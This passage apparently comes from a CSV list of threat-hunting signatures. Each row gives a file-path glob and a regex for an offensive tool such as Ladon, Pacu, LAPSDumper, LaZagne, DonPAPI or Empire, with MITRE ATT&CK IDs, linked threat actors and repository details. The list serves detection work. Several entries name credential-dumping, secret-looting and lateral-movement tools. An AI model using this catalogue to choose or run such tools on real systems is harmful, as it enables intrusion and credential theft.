"*/Ladon.go*",".{0,1000}\/Ladon\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8422"
"*/Ladon.ps1*",".{0,1000}\/Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8423"
"*/Ladon.py*",".{0,1000}\/Ladon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8424"
"*/Ladon/Ladon.*",".{0,1000}\/Ladon\/Ladon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8425"
"*/Ladon/obj/x86*",".{0,1000}\/Ladon\/obj\/x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8426"
"*/Ladon1.exe*",".{0,1000}\/Ladon1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8427"
"*/LadonGo/*",".{0,1000}\/LadonGo\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8428"
"*/lambda__backdoor_new_roles*",".{0,1000}\/lambda__backdoor_new_roles.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","8429"
"*/lambda__backdoor_new_sec_groups*",".{0,1000}\/lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","8430"
"*/lambda__backdoor_new_users*",".{0,1000}\/lambda__backdoor_new_users.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","8431"
"*/lambdaenum.py*",".{0,1000}\/lambdaenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","8432"
"*/LambdaLooter.py*",".{0,1000}\/LambdaLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","8433"
"*/lanattacks/*",".{0,1000}\/lanattacks\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8434"
"*/laps.py *--ldapserver*",".{0,1000}\/laps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","8437"
"*/laps.py *-u * -p *",".{0,1000}\/laps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","8438"
"*/laps.py*",".{0,1000}\/laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8439"
"*/laps_dump_*.txt*",".{0,1000}\/laps_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8440"
"*/LAPSDumper.git*",".{0,1000}\/LAPSDumper\.git.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","8441"
"*/LAPSToolkit.git*",".{0,1000}\/LAPSToolkit\.git.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","8442"
"*/LAPSToolkit.ps1*",".{0,1000}\/LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8443"
"*/LAPSToolkit.ps1*",".{0,1000}\/LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8444"
"*/LastenLoader.exe*",".{0,1000}\/LastenLoader\.exe.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","8445"
"*/Lastenzug.git*",".{0,1000}\/Lastenzug\.git.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","8446"
"*/lastpass.py*",".{0,1000}\/lastpass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","8447"
"*/Lateral movement.cna*",".{0,1000}\/Lateral\smovement\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8448"
"*/Lateral/SMB.cs*",".{0,1000}\/Lateral\/SMB\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8449"
"*/lateral_movement/*",".{0,1000}\/lateral_movement\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8450"
"*/lateral_movement/*.ps1",".{0,1000}\/lateral_movement\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8451"
"*/latest/download/linpeas.sh*",".{0,1000}\/latest\/download\/linpeas\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","8452"
"*/LatLoader.git*",".{0,1000}\/LatLoader\.git.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","1","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","8454"
"*/LatLoader.py*",".{0,1000}\/LatLoader\.py.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","1","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","8455"
"*/lazagne.exe*",".{0,1000}\/lazagne\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8456"
"*/lazagne.exe*",".{0,1000}\/lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8457"
"*/LaZagne.git*",".{0,1000}\/LaZagne\.git.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential 